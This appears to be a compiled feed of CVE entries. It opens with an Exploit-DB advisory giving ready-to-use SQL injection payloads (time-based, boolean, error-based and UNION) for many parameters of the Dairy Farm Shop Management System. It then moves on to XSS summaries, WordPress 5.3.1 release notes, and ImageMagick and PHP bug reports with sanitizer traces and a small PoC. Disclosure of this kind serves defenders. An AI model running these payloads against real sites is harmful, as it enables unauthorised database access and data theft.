PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
    # Google Dork: N/A
    # Date: 2020-01-03
    # Exploit Author: Chris Inzinga
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    # CVE: N/A
    
    # The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
    # SQL injection in multiple areas. The most severe of these is the username 
    # parameter on the login page as this injection can be done unauthenticated.
    
    
    ================================ 'username' - SQLi ================================
    
    POST /dfsms/index.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    username=test&password=test&login=
    
    ---
    Parameter: username (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'category' & 'categorycode' - SQLi ================================
    
    POST /dfsms/add-category.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/add-category.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 39
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    category=test&categorycode=test&submit=
    
    ---
    Parameter: category (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    ---
    Parameter: categorycode (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'companyname' - SQLi ================================
    
    ---
    Parameter: companyname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'productname' & 'productprice' - SQLi ================================
    
    ---
    Parameter: productname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
    ---
    ---
    Parameter: productprice (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'fromdate' & 'todate' - SQLi ================================
    
    ---
    Parameter: todate (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 5 columns
        Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
    
    Parameter: fromdate (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
    ---
    
    
    
    ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
    
    ---
    Parameter: emailid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: adminname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: mobilenumber (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
    ---

CVE-2020-5307: OffSec’s Exploit Database Archive

Codoforum 4.8.3 allows XSS via a post using parameters display name, title name, or content.

  
**Notice**: Trying to access array offset on value of type bool in **/home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/Controller/forum.php** on line **199**

**Fatal error**: Uncaught PDOException: SQLSTATE\[42000\]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'AND t.topic\_status <> 0 AND ( EXISTS (SELECT 1 FROM codo\_permissions AS per...' at line 3 in /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Forum/Category.php:214 Stack trace: #0 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Forum/Category.php(214): PDO->query('SELECT COUNT(t....') #1 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/Controller/forum.php(200): CODOF\\Forum\\Category->get\_total\_num\_topics(NULL) #2 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/routes.php(483): Controller\\forum->category('news-and-announ...', 1) #3 \[internal function\]: {closure}('news-and-announ...') #4 /home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Router/ in **/home/mainpage/domains/codologic.private-server.stream/public\_html/forum/sys/CODOF/Forum/Category.php** on line **214**

CVE-2020-5306

The Postie plugin 1.9.40 for WordPress allows XSS, as demonstrated by a certain payload with jaVasCript:/* at the beginning and a crafted SVG element.

CVE-2019-20204: Postie

An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.

CVE-2019-20141

wp_kses_bad_protocol in wp-includes/kses.php in WordPress before 5.3.1 mishandles the HTML5 colon named entity, allowing attackers to bypass input sanitization, as demonstrated by the javascript&colon; substring.

WordPress 5.3.1 is now available!

This security and maintenance release features 46 fixes and enhancements. Plus, it adds a number of security fixes—see the list below.

WordPress 5.3.1 is a short-cycle maintenance release. The next major release will be version 5.4.

You can download WordPress 5.3.1 by clicking the button at the top of this page, or visit your **Dashboard → Updates** and click **Update Now**.

If you have sites that support automatic background updates, they’ve already started the update process.

**Security updates**

Four security issues affect WordPress versions 5.3 and earlier; version 5.3.1 fixes them, so you’ll want to upgrade. If you haven’t yet updated to 5.3, there are also updated versions of 5.2 and earlier that fix the security issues.

*   Props to Daniel Bachhuber for finding an issue where an unprivileged user could make a post sticky via the REST API.
*   Props to Simon Scannell of RIPS Technologies for finding and disclosing an issue where cross-site scripting (XSS) could be stored in well-crafted links.
*   Props to the WordPress.org Security Team for hardening wp_kses_bad_protocol() to ensure that it is aware of the named colon attribute.
*   Props to Nguyen The Duc for discovering a stored XSS vulnerability using block editor content.

**Maintenance updates**

Here are a few of the highlights:

*   Administration: improvements to admin form controls height and alignment standardization (see related dev note), dashboard widget links accessibility and alternate color scheme readability issues (see related dev note).
*   Block editor: fix Edge scrolling issues and intermittent JavaScript issues.
*   Bundled themes: add customizer option to show/hide author bio, replace JS based smooth scroll with CSS (see related dev note) and fix Instagram embed CSS.
*   Date/time: improve non-GMT dates calculation, fix date format output in specific languages and make get_permalink() more resilient against PHP timezone changes.
*   Embeds: remove CollegeHumor oEmbed provider as the service doesn’t exist anymore.
*   External libraries: update sodium_compat.
*   Site health: allow the remind interval for the admin email verification to be filtered.
*   Uploads: avoid thumbnails overwriting other uploads when filename matches, and exclude PNG images from scaling after upload.
*   Users: ensure administration email verification uses the user’s locale instead of the site locale.

For more information, browse the full list of changes on Trac or check out the version 5.3.1 HelpHub documentation page.

**Thanks!**

In addition to the security researchers mentioned above, thank you to everyone who contributed to WordPress 5.3.1:

123host, acosmin, Adam Silverstein, Albert Juhé Lluveras, Alex Concha, Alex Mills, Anantajit JG, Anders Norén, andraganescu, Andrea Fercia, Andrew Duthie, Andrew Ozz, Andrey “Rarst” Savchenko, aravindajith, archon810, Ate Up With Motor, Ayesh Karunaratne, Birgir Erlendsson (birgire), Boga86, Boone Gorges, Carolina Nymark, Chetan Prajapati, Csaba (LittleBigThings), Dademaru, Daniel Bachhuber, Daniele Scasciafratte, Daniel Richards, David Baumwald, David Herrera, Dion hulse, ehtis, Ella van Durpe, epiqueras, Fabian, Felix Arntz, flaviozavan, Garrett Hyder, Glenn, Grzegorz (Greg) Ziółkowski, Grzegorz.Janoszka, Hareesh Pillai, Ian Belanger, ispreview, Jake Spurlock, James Huff, James Koster, Jarret, Jasper van der Meer, Jb Audras, jeichorn, Jer Clarke, Jeremy Felt, Jip Moors, Joe Hoyle, John James Jacoby, Jonathan Desrosiers, Jonny Harris, Joost de Valk, Jorge Costa, Joy, Juliette Reinders Folmer, justdaiv, Kelly Dwan, Kharis Sulistiyono, Kite, kyliesabra, lisota, lukaswaudentio, Maciej Mackowiak, marcelo2605, Marius L. J., Mat Lipe, mayanksonawat, Mel Choyce-Dwan, Michael Arestad, miette49, Miguel Fonseca, mihdan, Mike Auteri, Mikko Saari, Milan Petrovic, Mukesh Panchal, NextScripts, Nick Daugherty, Niels Lange, noyle, Ov3rfly, Paragon Initiative Enterprises, Paul Biron, Peter Wilson, Rachel Peter, Riad Benguella, Ricard Torres, Roland Murg, Ryan McCue, Ryan Welcher, SamuelFernandez, sathyapulse, Scott Taylor, scvleon, Sergey Biryukov, sergiomdgomes, SGr33n, simonjanin, smerriman, steevithak, Stephen Bernhardt, Stephen Edgar, Steve Dufresne, Subrata Mal, Sultan Nasir Uddin, Sybre Waaijer, Tammie Lister, Tanvirul Haque, Tellyworth, timon33, Timothy Jacobs, Timothée Brosille, tmatsuur, Tung Du, Veminom, vortfu, waleedt93, williampatton, wpgurudev, and Zack Tollman.

CVE-2019-20041: WordPress 5.3.1 Security and Maintenance Release

In wp-includes/formatting.php in WordPress 3.7 to 5.3.0, the function wp_targeted_link_rel() can be used in a particular way to result in a stored cross-site scripting (XSS) vulnerability. This has been patched in WordPress 5.3.1, along with all the previous WordPress versions from 3.7 to 5.3 via a minor release.

CVE-2019-20042

In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer overflow in the function WriteSGIImage of coders/sgi.c.

**Prerequisites**

*   I have written a descriptive issue title
*   I have verified that I am using the latest version of ImageMagick
*   I have searched open and closed issues to ensure it has not already been reported

**Description**

There is a heap buffer overflow vulnerability in function WriteSGIImage of coders/sgi.c.

**Steps to Reproduce**

poc  
magick convert $poc ./test.sgi  
=================================================================  
==41720==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f70c67db7f8 at pc 0x0000006c216f bp 0x7ffea64ddb50 sp 0x7ffea64ddb40  
WRITE of size 1 at 0x7f70c67db7f8 thread T0  
    #0 0x6c216e in WriteSGIImage coders/sgi.c:1051  
    #1 0x849036 in WriteImage MagickCore/constitute.c:1159  
    #2 0x849d5b in WriteImages MagickCore/constitute.c:1376  
    #3 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305  
    #4 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185  
    #5 0x4100a1 in MagickMain utilities/magick.c:149  
    #6 0x410282 in main utilities/magick.c:180  
    #7 0x7f70c10c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)  
    #8 0x40fbb8 in _start (/home/test/temp/ImageMagick/utilities/magick+0x40fbb8)

0x7f70c67db7f8 is located 8 bytes to the left of 524288-byte region [0x7f70c67db800,0x7f70c685b800)  
allocated by thread T0 here:  
    #0 0x7f70c5868076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)  
    #1 0x4408c7 in AcquireAlignedMemory MagickCore/memory.c:265  
    #2 0x440beb in AcquireVirtualMemory MagickCore/memory.c:621  
    #3 0x6c1ead in WriteSGIImage coders/sgi.c:1030  
    #4 0x849036 in WriteImage MagickCore/constitute.c:1159  
    #5 0x849d5b in WriteImages MagickCore/constitute.c:1376  
    #6 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305  
    #7 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185  
    #8 0x4100a1 in MagickMain utilities/magick.c:149  
    #9 0x410282 in main utilities/magick.c:180  
    #10 0x7f70c10c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow coders/sgi.c:1051 WriteSGIImage  
Shadow bytes around the buggy address:  
  0x0fee98cf36a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0fee98cf36e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
=>0x0fee98cf36f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]  
  0x0fee98cf3700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x0fee98cf3740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
  Addressable:           00  
 Partially addressable: 01 02 03 04 05 06 07  
  Heap left redzone:       fa  
  Heap right redzone:      fb  
  Freed heap region:       fd  
  Stack left redzone:      f1  
  Stack mid redzone:       f2  
  Stack right redzone:     f3  
  Stack partial redzone:   f4  
  Stack after return:      f5  
  Stack use after scope:   f8  
  Global redzone:          f9  
  Global init order:       f6  
  Poisoned by user:        f7  
  Container overflow:      fc  
  Array cookie:            ac  
  Intra object redzone:    bb  
  ASan internal:           fe  
==41720==ABORTING

**System Configuration**

*   ImageMagick version:  
    Version: ImageMagick 7.0.8-43 Q16 x86_64 2019-04-29 https://imagemagick.org  
    Copyright: ? 1999-2019 ImageMagick Studio LLC  
    License: https://imagemagick.org/script/license.php  
    Features: Cipher DPC HDRI OpenMP(4.0)   
    Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib
*   Environment (Operating system, version and so on):  
    Distributor ID:	Ubuntu  
    Description:	Ubuntu 16.04.1 LTS  
    Release:	16.04  
    Codename:	xenial
*   Additional information:

CVE-2019-19948: heap-buffer-overflow in WriteSGIImage of coders/sgi.c · Issue #1562 · ImageMagick/ImageMagick

In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 on Windows, PHP link() function accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access.

Sec Bug #78862

link() silently truncates after a null byte on Windows

Submitted:

2019-11-23 09:23 UTC

Modified:

2019-12-16 19:01 UTC

From:

ryat@php.net

Assigned:

stas (profile)

Status:

Closed

Package:

Filesystem function related

PHP Version:

7.3.12

OS:

Windows

Private report:

No

CVE-ID:

2019-11044

 **\[2019-11-23 09:23 UTC\] ryat@php.net**

Description:
------------
ext/standard/link\_win32.c:
\`\`\`
PHP\_FUNCTION(link)
{
	...
	if (zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "ss", &frompath, &frompath\_len, &topath, &topath\_len) == FAILURE) {
		return;
	}
\`\`\`

PoC for Windows:
\`\`\`
<?php

link("ryat\\x00php", "php\\x00ryat");

?>
\`\`\`

Fix:
\`\`\`
if (zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "pp", &frompath, &frompath\_len, &topath, &topath\_len) == FAILURE) 
\`\`\`

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2019-11-23 12:07 UTC\] cmb@php.net**

\-Status: Open +Status: Verified \-Package: \*General Issues +Package: Filesystem function related \-Assigned To: +Assigned To: stas

 **\[2019-11-30 22:01 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2019-11044

 **\[2019-12-16 19:02 UTC\] stas@php.net**

\-Status: Verified +Status: Closed

CVE-2019-11044: link() silently truncates after a null byte on Windows

When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.

Sec Bug #78793

Use-after-free in exif parsing under memory sanitizer

Submitted:

2019-11-07 21:13 UTC

Modified:

2019-12-16 19:14 UTC

From:

nikic@php.net

Assigned:

kalle (profile)

Status:

Closed

Package:

EXIF related

PHP Version:

master-Git-2019-11-07 (Git)

OS:

Private report:

No

CVE-ID:

2019-11050

 **\[2019-11-07 21:13 UTC\] nikic@php.net**

Description:
------------
$f = "ext/exif/tests/bug77950.tiff";
for ($i = 0; $i < 10; $i++) {
    fprintf(STDERR, "ITERATION $i:\\n");
    @exif\_read\_data($f);
}

This produces a use-after-free (use-of-uninitialized-value with heap deallocation origin) when run under memory sanitizer on the 7th iteration.

Unfortunately I have not been able to reproduce this under address sanitizer. Based on the fact that this needs multiple iterations, I'm assuming that this is sensitive to the precise memory layout, and memory sanitizer happens to produce the right one.

==19395==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x2119042 in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c:351:2
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #14 0x4368e9 in \_start (/home/nikic/php-src-msan/sapi/cli/php+0x4368e9)

  Uninitialized value was stored to memory at
    #0 0x2118d9f in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c:347:23
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0x2118818 in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c:321:13
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0x21184af in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0x2129fb3 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:807:14
    #1 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #2 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #3 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #4 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #5 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #6 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #7 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #8 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #9 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #10 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #11 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #12 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0xd5a64a in exif\_iif\_add\_value /home/nikic/php-src-msan/ext/exif/exif.c:2186:26
    #1 0xd04751 in exif\_iif\_add\_tag /home/nikic/php-src-msan/ext/exif/exif.c:2227:2
    #2 0xd3e3f0 in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3529:2
    #3 0xd49d49 in exif\_process\_IFD\_in\_MAKERNOTE /home/nikic/php-src-msan/ext/exif/exif.c:3172:8
    #4 0xd3ccfd in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3477:10
    #5 0xd274b2 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4148:12
    #6 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #7 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #8 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #9 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #10 0xd1b38e in exif\_scan\_FILE\_header /home/nikic/php-src-msan/ext/exif/exif.c:4231:9
    #11 0xd1963d in exif\_read\_from\_impl /home/nikic/php-src-msan/ext/exif/exif.c:4357:8
    #12 0xcfb4f0 in exif\_read\_from\_stream /home/nikic/php-src-msan/ext/exif/exif.c:4374:8
